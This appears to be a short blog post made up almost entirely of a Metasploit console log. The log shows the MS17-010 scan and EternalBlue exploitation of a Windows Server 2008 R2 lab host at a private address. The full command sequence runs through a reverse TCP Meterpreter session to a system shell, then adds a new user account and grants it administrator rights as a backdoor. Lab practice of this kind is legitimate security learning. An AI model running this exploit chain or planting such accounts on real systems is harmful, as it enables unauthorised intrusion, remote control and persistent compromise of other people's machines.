Pentesting 2008 R2: MS17-010


┌──(root💀laizr)-[~]
└─# msfconsole                                                       127 ⨯

       =[ metasploit v6.0.15-dev                          ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the edit command to open the currently active module in your editor

msf6 > set RHOSTS 172.16.16.129
RHOSTS => 172.16.16.129
msf6 > run
[-] Unknown command: run.
msf6 >  use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 172.16.16.129
RHOSTS => 172.16.16.129
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 172.16.16.129:445     - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.16.129:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         172.16.16.129    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.16.46     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 172.16.16.129
rhost => 172.16.16.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.16.46
lhost => 172.16.16.46
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.16.16.46:4444 
[*] 172.16.16.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.16.129:445     - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.16.129:445     - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.16.129:445 - Connecting to target for exploitation.
[+] 172.16.16.129:445 - Connection established for exploitation.
[+] 172.16.16.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.16.129:445 - CORE raw buffer dump (46 bytes)
[*] 172.16.16.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76  Windows Web Serv
[*] 172.16.16.129:445 - 0x00000010  65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20  er 2008 R2 7601 
[*] 172.16.16.129:445 - 0x00000020  53 65 72 76 69 63 65 20 50 61 63 6b 20 31        Service Pack 1  
[+] 172.16.16.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.16.129:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.16.129:445 - Sending all but last fragment of exploit packet
[*] 172.16.16.129:445 - Starting non-paged pool grooming
[+] 172.16.16.129:445 - Sending SMBv2 buffers
[+] 172.16.16.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.16.129:445 - Sending final SMBv2 buffers.
[*] 172.16.16.129:445 - Sending last fragment of exploit packet!
[*] 172.16.16.129:445 - Receiving response from exploit packet
[+] 172.16.16.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.16.129:445 - Sending egg to corrupted connection.
[*] 172.16.16.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.16.16.129
[*] Meterpreter session 1 opened (172.16.16.46:4444 -> 172.16.16.129:49251) at 2021-01-18 19:12:27 +0800
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > shell
Process 2808 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>sysinfo
sysinfo
'sysinfo' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

C:\Windows\system32>screenshot
screenshot
'screenshot' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
C:\Windows\system32>net user
net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    
命令运行完毕，但发生一个或多个错误。


C:\Windows\system32>net user laizr 123.com /add
net user laizr 123.com /add
命令成功完成。


C:\Windows\system32>net

C:\Windows\system32>sysinfo
sysinfo
'sysinfo' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

C:\Windows\system32>net localgroup administrators laizr /add
net localgroup administrators laizr /add
命令成功完成。


C:\Windows\system32>cd ..
cd ..

C:\Windows>cd...
cd...

C:\Windows>cd..
cd..

C:\>mkdir aaa
mkdir aaa

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 709C-5214


posted @ 2021-01-18 13:17  HelloBytes